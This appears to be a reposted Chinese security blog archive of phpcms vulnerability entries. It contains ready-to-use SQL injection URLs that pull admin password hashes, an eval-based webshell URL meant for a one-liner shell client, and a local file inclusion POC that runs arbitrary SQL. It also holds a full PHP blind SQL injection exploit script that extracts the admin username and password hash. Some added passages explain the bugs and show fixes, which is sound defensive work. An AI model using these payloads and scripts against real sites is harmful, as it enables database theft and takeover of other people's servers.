
phpcms V9 Blind SQL Injection Vulnerability

Submitted by admin
2011, January 23, 11:23 AM

=================================================================
    phpcms V9 Blind SQL Injection Vulnerability
=================================================================

Software:   phpcms V9
Vendor:     www.phpcms.cn
Vuln Type:  Blind SQL Injection
Download link:  http://www.phpcms.cn/2010/1229/326.html
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info

Google Dork:    http://www.exploit-db.com/ghdb/3676/    // check here ^_^

References:
http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html

=================================================================

    exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

    Example p0c

[!] http://host/index.php?m=content&c=rss&catid=10  <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

[+] http://host/index.php?m=content&c=rss&catid=5   <= show MySQL Error (table)

=================================================================

    Nothing Impossible In This World Even Nobody`s Perfect

=================================================================

=========================| -=[ E0F ]=- |=========================

Tags: phpcms

Phpcms 2008 flash_upload.php file injection vulnerability

Submitted by admin
2011, January 21, 12:37 PM

Affected version: Phpcms 2008 V2

Published today by a Japanese researcher.

Injection URL:

http://server/phpcms_th/flash_upload.php?modelid=1

[screenshot]

Tags: phpcms

Phpcms 2008 query.php SQL injection vulnerability

Submitted by admin
2010, October 31, 9:02 PM

EXP:

ask/query.php?action=edit_answer&dosubmit=1&pid=2&posts[%6D%65%73%73%61%67%65%60%3D%28%73%65%6C%65%63%74%20%70%61%73%73%77%6F%72%64%20%66%72%6F%6D%20%70%68%70%63%6D%73%5F%6D%65%6D%62%65%72%20%77%68%65%72%65%20%67%72%6F%75%70%69%64%3D%31%29%20%77%68%65%72%65%20%61%73%6B%69%64%3D%32%23]

URL-decoded, the key of the posts[] array is:

message`=(select password from phpcms_member where groupid=1) where askid=2#

That is, the injection sits in the array *key*, not the value: the key is used as a column name when the edit is turned into an UPDATE ... SET `message`=..., so the backtick closes the quoted identifier, the subquery supplies the admin password hash as the new value, the trailing "where askid=2" replaces the original WHERE, and # comments out the rest.

Tags: phpcms

Phpcms 2008 space.api.php SQL injection vulnerability

Submitted by admin
2010, October 31, 9:02 PM

EXP:

api/space.api.php?userid=2&order=if((select%20count(*)%20from%20phpcms_member)>1,contentid,1)%20desc%23

The order parameter is spliced into the ORDER BY clause; if() picks the sort column according to the truth of the subquery, so the ordering of the rows that come back is the boolean oracle (here: "are there more than one member?").

Tags: phpcms

A very old PHPCMS 2008 SP2 0day

Submitted by admin
2010, September 11, 2:36 PM

http://URL/tags.php?id={${${eval($_POST[x])}}}

Point a one-liner (一句话) webshell client straight at the URL above.

I came across this vulnerability while analysing a site's logs and saw someone POSTing data to it, but I have looked at several versions and still don't know what causes it.

If any of you know, please tell me.

 

Source:

http://hi.baidu.com/luc1f3r%5F/blog/item/50a903673df15b6e0d33faed.html

Tags: phpcms

Lately I have been playing armchair general and got looked down on for it; but there is nothing for it, the bird that sticks its neck out gets laughed at too! Anyway this stuff is no use sitting with me, it would just rot on the hard disk! So whenever there is the slightest stir, I will publish. The WooYun article is here: http://www.wooyun.org/bug.php?action=view&id=497 ; it has not released the details yet... so... I will describe it.

Plenty of Phpcms2008 problems have been exposed before, but nobody has brought up this local file inclusion. xiaoming once mentioned it in the core section of t00ls, but this local inclusion can in fact be exploited even without a neighbouring site (旁注): by adding an administrator or changing the administrator password!

OK, the local inclusion first. There are several; I don't know which one WooYun means, so I will take it to be the most obvious one. It is a very obvious bug, and I have no idea why it still shows up in phpcms. First the code:

The file is wap/index.php:

<?php
include '../include/common.inc.php';   // pulls in the global request handling quoted below
include './include/global.func.php';
$lang = include './include/lang.inc.php';
if(preg_match('/(mozilla|m3gate|winwap|openwave)/i', $_SERVER['HTTP_USER_AGENT']))
{
    header('location:../');//check; comment it out while debugging, from http://www.oldjun.com
    // note: no exit() after header(), so a desktop browser is sent a redirect but the script keeps running
}
wmlHeader($PHPCMS['sitename']);//check; comment it out while debugging, from http://www.oldjun.com

$action = isset($action) && !empty($action) ? $action : 'index';//action is taken straight from the request, from http://www.oldjun.com

if($action)
{
    include './include/'.$action.'.inc.php';//local file inclusion, from http://www.oldjun.com
}

$html = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $html) : $html;
echo str_replace('\n', "\n", $html);   // newline handling reconstructed from the garbled listing
wmlFooter();
?>

Strip out those few checks and you can debug it. action is neither restricted nor filtered, and then comes the disastrous global code (pulled in through common.inc.php), which turns every request parameter into a PHP variable:

if($_REQUEST)
{
    if(MAGIC_QUOTES_GPC)
    {
        $_REQUEST = new_stripslashes($_REQUEST);
        if($_COOKIE) $_COOKIE = new_stripslashes($_COOKIE);
        extract($db->escape($_REQUEST), EXTR_SKIP);
    }
    else
    {
        $_POST = $db->escape($_POST);
        $_GET = $db->escape($_GET);
        $_COOKIE = $db->escape($_COOKIE);
        @extract($_POST,EXTR_SKIP);
        @extract($_GET,EXTR_SKIP);
        @extract($_COOKIE,EXTR_SKIP);
    }
    if(!defined('IN_ADMIN')) $_REQUEST = filter_xss($_REQUEST, ALLOWED_HTMLTAGS);
    if($_COOKIE) $db->escape($_COOKIE);
}

So the local include succeeds; what remains is how to exploit it. The included name is forced to end in .inc.php, and phpcms developers are very fond of that naming convention, so there are plenty of something.inc.php files: just include one that does something useful. A quick look turns up:

formguide/admin/include/fields/datetime/field_add.inc.php

<?php
if($dateformat == 'date')
{
    $sql = "ALTER TABLE `$tablename` ADD `$field` DATE NOT NULL DEFAULT '0000-00-00'";
}
elseif($dateformat == 'datetime')
{
    $sql = "ALTER TABLE `$tablename` ADD `$field` DATETIME NOT NULL DEFAULT '0000-00-00 00:00:00'";
}
elseif($dateformat == 'int')
{
    if($format)
    $sql = "ALTER TABLE `$tablename` ADD `$field` INT UNSIGNED NOT NULL DEFAULT '0'";
}

$db->query($sql);//$sql is as good as uninitialised, from http://www.oldjun.com
?>

$dateformat is never set on this path, so none of the branches run and this file never assigns $sql either; whatever the request supplied under the name sql has already been extract()ed into $sql by the global code, and $db->query() runs it as-is. Two practical notes: the value has been through $db->escape(), so quotes arrive backslashed (use statements that need none, or hex/CHAR()), and because the file is reached through wap/index.php rather than the admin entry point, nothing checks for an administrator session first. So it executes directly:

POC:
http://127.0.0.1/phpcms/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=select 1
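To make the traversal and its fix concrete, here is an added example (written for this page; it is neither oldjun's nor phpcms's code) that resolves the include path the way wap/index.php does, shows where the POC's action lands, and then applies the two checks a fix needs: an allowlist of action names and a containment check on the normalised path. The webroot and the action names are assumptions for the demo.

```python
import posixpath

# Assumed deployment layout for the demo (not taken from the page).
WEBROOT = "/var/www/phpcms"
WAP_INCLUDE_DIR = posixpath.join(WEBROOT, "wap", "include")

# The action value from the page's POC.
POC_ACTION = "../../formguide/admin/include/fields/datetime/field_add"


def vuln_include_path(action):
    """What wap/index.php does: include './include/'.$action.'.inc.php'
    with $action coming straight from the request."""
    return posixpath.normpath(posixpath.join(WAP_INCLUDE_DIR, action + ".inc.php"))


def escapes_include_dir(path):
    """True when the normalised path is no longer under wap/include."""
    return posixpath.commonpath([WAP_INCLUDE_DIR, path]) != WAP_INCLUDE_DIR


# Hypothetical action names; the real set is whatever wap/include/*.inc.php exists.
ALLOWED_ACTIONS = {"index", "list", "show"}


def safe_include_path(action):
    """Allowlist first (the real fix for a fixed set of actions); the
    containment check is defence in depth for when the list and the
    files on disk drift apart."""
    if action not in ALLOWED_ACTIONS:
        raise ValueError("unknown action %r" % action)
    path = vuln_include_path(action)
    if escapes_include_dir(path):
        raise ValueError("path escapes include dir: %s" % path)
    return path


def demo():
    """Returns (path the POC resolves to, whether it escapes wap/include,
    whether the hardened resolver rejects it)."""
    resolved = vuln_include_path(POC_ACTION)
    try:
        safe_include_path(POC_ACTION)
        blocked = False
    except ValueError:
        blocked = True
    return resolved, escapes_include_dir(resolved), blocked


if __name__ == "__main__":
    print(demo())
    print(safe_include_path("index"))
```

Note that the forced .inc.php suffix does nothing against this: the traversal stays inside the web tree and simply picks a different .inc.php file, which is why the allowlist, not the suffix, is the control.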

 

Original: http://www.oldjun.com/blog/index.php/archives/73/

Tags: phpcms

A phpcms 0day

Submitted by admin
2010, August 10, 9:36 PM

Just saw someone asking about this in the bar, so I'm reposting it..
1. Find any article, post a comment on it and note the comment ID.

[screenshot]

 

2. Submit /comment/comment.php?field=content%3D(select+concat(username%2C0x3a%2Cpassword)+from+phpcms_member+where+groupid%3D1+limit+1)+where+commentid%3D1%23&action=vote, replacing the 1 in commentid=1 with your comment ID. The field value evidently lands in the SET clause of the vote UPDATE, so the subquery overwrites that comment's content with the admin's username:password pair and # comments out the rest of the statement.

[screenshot]

 

3. View the comment again.
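The two EXPs on this page that rewrite a SET clause (the query.php posts[...] key above and this field= parameter) abuse the same helper shape: request array keys become column names and the WHERE is concatenated on. The following added example (written for this page, not phpcms code) reproduces that helper against an in-memory sqlite database, runs the query.php-style payload through it, and shows the hardened form with an allowlist of columns and bound parameters; the same binding also covers the integer-in-WHERE case (adsid) further down the page. Table layout and rows are constructed for the demo, and sqlite's "-- " comment stands in for MySQL's "#".

```python
import sqlite3

# Constructed sample data (not real credentials): an admin row whose hash the
# attacker wants, and an "ask" answer (askid=2) the attacker may legitimately edit.
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE phpcms_member (userid INTEGER, username TEXT, password TEXT, groupid INTEGER);
        CREATE TABLE phpcms_ask_posts (askid INTEGER, userid INTEGER, message TEXT);
        INSERT INTO phpcms_member VALUES (1, 'admin', '%s', 1), (2, 'guest', 'irrelevant', 8);
        INSERT INTO phpcms_ask_posts VALUES (1, 1, 'admin answer'), (2, 2, 'my answer');
    """ % ADMIN_HASH)
    return conn


def vuln_update(conn, table, data, where):
    """The unsafe helper shape: every key of the request array becomes a column
    name in SET, only the values are escaped, WHERE is string concatenation."""
    pairs = ", ".join("`%s`='%s'" % (k, str(v).replace("'", "''")) for k, v in data.items())
    sql = "UPDATE %s SET %s WHERE %s" % (table, pairs, where)
    conn.execute(sql)
    return sql


def attack_vuln():
    """Same shape as the query.php EXP: the *key* closes the backtick, swaps in a
    subquery plus its own WHERE, and comments out everything the helper appends."""
    conn = fresh_db()
    attacker_uid = 2
    posts = {"message`=(select password from phpcms_member where groupid=1) where askid=2-- ": "hi"}
    sql = vuln_update(conn, "phpcms_ask_posts", posts, "askid=2 AND userid=%d" % attacker_uid)
    leaked = conn.execute("SELECT message FROM phpcms_ask_posts WHERE askid=2").fetchone()[0]
    return sql, leaked  # leaked == ADMIN_HASH: the attacker now reads it in their own answer


# Hardened version: column names come from an allowlist, never from the request;
# values and the ownership WHERE are bound parameters.
ALLOWED_COLUMNS = {"phpcms_ask_posts": {"message"}}


def safe_update(conn, table, data, askid, uid):
    unknown = set(data) - ALLOWED_COLUMNS[table]
    if unknown:
        raise ValueError("unexpected column(s): %s" % sorted(unknown))
    pairs = ", ".join("%s=?" % k for k in data)  # k is allowlisted at this point
    params = list(data.values()) + [askid, uid]
    cur = conn.execute("UPDATE %s SET %s WHERE askid=? AND userid=?" % (table, pairs), params)
    return cur.rowcount


def attack_safe():
    """The same payload against safe_update(): rejected before any SQL runs."""
    conn = fresh_db()
    posts = {"message`=(select password from phpcms_member where groupid=1) where askid=2-- ": "hi"}
    try:
        safe_update(conn, "phpcms_ask_posts", posts, 2, 2)
        return "update ran"
    except ValueError:
        return conn.execute("SELECT message FROM phpcms_ask_posts WHERE askid=2").fetchone()[0]


def legit_edit():
    """An ordinary edit of one's own answer still works, and cannot touch askid=1."""
    conn = fresh_db()
    own = safe_update(conn, "phpcms_ask_posts", {"message": "edited"}, 2, 2)
    other = safe_update(conn, "phpcms_ask_posts", {"message": "pwned"}, 1, 2)  # not the owner: 0 rows
    return own, other


if __name__ == "__main__":
    sql, leaked = attack_vuln()
    print(sql)
    print("leaked:", leaked)
    print("hardened:", attack_safe(), legit_edit())
```

The printed statement makes the mechanism visible: the helper's own `='hi' WHERE askid=2 AND userid=2` is still there, but after the injected comment marker, so neither the value nor the ownership check ever reaches the database.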

[screenshot]

 

Tags: phpcms

phpcms2008 sp3 universal 0day

Submitted by admin
2010, May 25, 3:04 PM

 

This vulnerability was published half a year ago by dindle on Haiyang Dingduan (海洋顶端), so credit the source when reposting.
Injection:
yp/company.php?where=%23
Then log into the admin backend and visit

http://www.xx.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

[screenshot]

and edit in the shell. phpcms2008 also has several inclusion bugs, but I have not found a good way to exploit them yet, so I am not publishing them for now.

Tags: phpcms

phpcms2008sp4 latest SQL injection

Submitted by admin
2010, May 25, 2:57 PM

Vulnerability name:
phpcms2008sp4 latest SQL injection
Release date:
2010-05-24
Affected system:
phpcms2008sp4_UTF8_100510
Summary:
Phpcms is a leading Chinese website content management system and also an open-source PHP development framework. It consists of more than 20 modules (content models, members, Q&A, topics, finance, orders, advertising, mail subscription, private messages, custom forms, site-wide search and so on) and ships five built-in content models: news, images, downloads, information and products. It is developed modularly and supports custom content models and member models with custom fields.
Vulnerability description:
ads\include\ads.class.php

function edit($ads, $adsid, $username = '') //line 110
{
    if(!$this->check_form($ads)) return FALSE;
    $ads = $this->check_form($ads);
    if(defined('IN_ADMIN'))
    {
        $ads['fromdate'] = strtotime($ads['fromdate']);
        $ads['todate'] = strtotime($ads['todate']);
    }
    $this->adsid = $adsid;
    $where = ' adsid='.$this->adsid;            // $adsid is concatenated into WHERE unchanged
    if($username) $where .= " AND username='$username'";
    return $this->db->update($this->table, $ads, $where);
}

Ads\member.php
if(!$c_ads->edit($info, $adsid, $_username)) showmessage($c_ads->msg(), 'goback'); //line 47
The variable $adsid goes into the SQL query without any processing, so it is SQL injectable.
Test method:
Register an ordinary member account.
Book an advertisement, then edit it.
[screenshot]
Change the value of adsid; that is the injection point. Submitting produces the following error:
[screenshot]
Solution:
Wait for the official patch, or change ads\include\ads.class.php to
$this->adsid = intval($adsid);

From: Jannock
Tags: phpcms

phpcms2008sp4 arbitrary file download vulnerability under IIS

Submitted by admin
2010, May 25, 8:02 AM

Affected system: phpcms2008sp4_UTF8_100510

Test method:
Register a member account.
Publish a download-type article (it does not need to pass review).
Preview it, then click download.

[screenshots]

Tags: phpcms

phpcms2008 sp3 universal 0day

Submitted by admin
2010, May 2, 9:15 AM

Injection: yp/company.php?where=%23

Then log into the admin backend and visit
http://www.heimian.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

and edit in the shell. phpcms2008 also has several inclusion bugs, but I have not found a good way to exploit them yet, so I am not publishing them for now.

PS: That lu jj on t00ls is a poser with no standards at all, passing off a backend get-shell bug as a universal UC 0day. BS.

Oh, and t00ls members of 会员 rank and above who have not changed their passwords, hurry up: you got owned a while back, I bet you don't even know.

[screenshot]

 

Tags: phpcms

phpcms2008 latest 0day & Exp (repost)

Submitted by admin
2009, December 19, 3:36 PM

The vulnerability is at lines 17-34 of yp/job.php, and urldecode() is the culprit. By the time this code runs, $genre has already been extract()ed from the request and escaped by the global $db->escape(); urldecode() then decodes it a second time, so a quote sent as %2527 (which the web server only turns into %27, leaving nothing for the escaper to backslash) becomes a raw ' inside the WHERE clause. The code:

==========================================================
switch($action)
{
    case 'list':
        $catid = intval($catid);
        $head['keywords'] .= '职位列表';
        $head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
        $head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
        $templateid = 'job_list';
        if($inputtime)
            $time = time() - 3600*$inputtime*24;
        else $time = 0;
        if($time < 0 )$time = 0;
        $where = "j.updatetime >= '{$time}' ";
        $genre = urldecode($genre);          // second decode: undoes the global escaping
        if($station)$where .= "AND j.station = '{$station}' ";
        if($genre)$where .= "AND c.genre = '{$genre}' ";   // raw quote lands here
        if(!trim($where))$where = '1';
        break;

=================================================================

exp:

<?php
/*
 * PhpCms 2008 (yp/job.php $genre) blind SQL injection exploit, by My5t3ry.
 * Tidied for this page: <?php open tag, $reply initialised, fsockopen() checked,
 * the invalid /e modifier dropped from preg_match() (it made the prefix grab
 * fail), and a guard so a character outside the key set no longer loops forever.
 */
if ($argc != 4)
    usage();

$hostname = $argv[1];
$path     = $argv[2];
$userid   = $argv[3];
$prefix   = "phpcms_"; // replaced below by the prefix leaked in the MySQL error

function usage()
{
    global $argv;
    echo
    "\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit".
    "\n[+] Author: My5t3ry".
    "\n[+] Site  : http://hi.baidu.com/netstart".
    "\n[+] Usage : php ".$argv[0]." <hostname> <path> <userid>".
    "\n[+] Ex.   : php ".$argv[0]." localhost /yp 1".
    "\n\n";
    exit();
}

// One GET to job.php with the injected $genre. Quotes travel as %2527: the
// server decodes that to %27, escape() finds nothing to backslash, and
// job.php's urldecode() turns it into a bare quote inside the WHERE clause.
function request($hostname, $path, $query)
{
    $fp = fsockopen($hostname, 80, $errno, $errstr, 10);
    if (!$fp)
        die("\n[-] Connection failed: $errstr ($errno)\n");

    $request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n".
               "Host: {$hostname}\r\n".
               "Connection: Close\r\n\r\n";

    fputs($fp, $request);

    $reply = '';
    while (!feof($fp))
        $reply .= fgets($fp, 1024);

    fclose($fp);
    return $reply;
}

function encode_query($query)
{
    $query = str_replace(" ", "%20", $query);
    return str_replace("'", "%2527", $query);
}

// The job list shows a non-empty c_orange span only when the injected
// condition is true: that span is the boolean oracle.
function oracle_true($outcode)
{
    preg_match("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);
    return isset($x[1]) && strlen(trim($x[1])) != 0;
}

function exploit($hostname, $path, $uid, $fld, $chr, $pos)
{
    global $prefix;

    $chr = ord($chr);

    $query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";

    return oracle_true(request($hostname, $path, encode_query($query)));
}

// Pull positions $from..$to of $fld one character at a time, trying every byte in $key.
function extract_field($hostname, $path, $userid, $fld, $key, $from, $to)
{
    $out = '';
    for ($pos = $from; $pos <= $to; $pos++)
    {
        $found = '?'; // printed when the byte is not in $key (e.g. upper case or '_')
        for ($chr = 0; $chr < strlen($key); $chr++)
        {
            if (exploit($hostname, $path, $userid, $fld, $key[$chr], $pos))
            {
                $found = $key[$chr];
                break;
            }
        }
        echo $found;
        $out .= $found;
    }
    return $out;
}

echo "\n--------------------------------------------------------------------------------\n";
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";

// Step 1: a lone quote breaks the query, and the MySQL error leaks the table prefix.
$outcode = request($hostname, $path, "x%2527");
preg_match('/FROM `(.+)yp_job/i', $outcode, $match);

if (!empty($match[1]))
{
    $prefix = $match[1];
    echo '[+]Good Job!We Got The pre -> '.$prefix."\n";
}
else
{
    die(" Exploit failed...");
}

// Step 2: username length, tried linearly from 0 to 20.
echo "[~]trying to get username length...\n";
$length = 0;
for ($i = 0; $i <= 20; $i++)
{
    $query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";
    if (oracle_true(request($hostname, $path, encode_query($query))))
    {
        $length = $i;
        break;
    }
}
if ($length == 0)
    die(" Exploit failed...");
echo "[+]length -> ".$length;

// Step 3: the username, lower-case letters and digits only (as in the original).
echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";
extract_field($hostname, $path, $userid, "username", "abcdefghijklmnopqrstuvwxyz0123456789", 1, $length);

// Step 4: the original pulls only characters 9..24 of the MD5 hash.
echo "\n[+]password(md5) -> ";
extract_field($hostname, $path, $userid, "password", "abcdef0123456789", 9, 24);

echo "\n[+]Done!";
echo "\n\n--------------------------------------------------------------------------------";

?>

Tags: phpcms